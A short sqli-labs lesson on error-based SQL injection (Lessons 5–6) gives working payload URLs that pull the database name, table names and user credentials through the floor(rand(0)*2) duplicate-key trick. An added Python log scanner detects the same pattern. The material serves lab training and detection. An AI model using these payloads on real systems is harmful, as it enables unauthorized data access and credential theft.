Mini Lesson -- Error-Based Injection (GET)

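Environment: sqli-labs

Less 5

1. Enter an arbitrary ' as input and look at the error message that comes back.

From the error we can tell that the parameter has to be closed with a single quote.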

 

2. Construct the statement that retrieves the database name

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

3. Statement to retrieve the table names

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

4. Retrieve the user information

http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a)from security.users limit 2,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

Less 6

The parameter is closed with a double quote; the method is otherwise the same as above.
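
An added example, not part of the original lesson or of sqli-labs: a defender-side check that scans web access log lines for the marker combination shared by the Less 5 and Less 6 requests above, namely floor(rand(0)*2) together with count(*) and group by, which is what forces the duplicate-key error. The log lines, client addresses, and the names markers_in and inspect_line are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Markers of the duplicate-key error technique seen in the requests above.
MARKERS = {
    "floor(rand()*2)": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "count(*)": re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I),
    "group by": re.compile(r"\bgroup\s+by\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
}
REQUIRED = {"floor(rand()*2)", "count(*)", "group by"}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def markers_in(value):
    """Return the set of marker names found in one decoded parameter value."""
    # Drop /* */ comments and collapse whitespace so spacing tricks do not hide markers.
    text = re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value))
    return {name for name, rx in MARKERS.items() if rx.search(text)}

def inspect_line(line):
    """Return (param, sorted markers) pairs that match the error-based pattern."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space, as the server does.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        found = markers_in(value)
        if REQUIRED <= found:
            findings.append((name, sorted(found)))
    return findings

# Constructed sample data: the table-name request from step 3 plus two benign requests.
STEP3 = ("1' union select 1,2,3 from (select count(*),concat((select concat(table_name,"
         "0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),"
         "floor (rand(0)*2))x from information_schema.tables group by x)a -- ")
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-5/?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-5/?id=%s HTTP/1.1" 200 640'
    % quote(STEP3),
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=group+by+tutorial HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, found in inspect_line(line):
            print("error-based SQLi pattern in %r: %s" % (param, ", ".join(found)))
```

Requiring all three core markers in one parameter keeps ordinary requests that merely mention "group by" from being flagged; information_schema is reported as extra context when present.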

 

Illegal use is prohibited; you bear the consequences yourself.
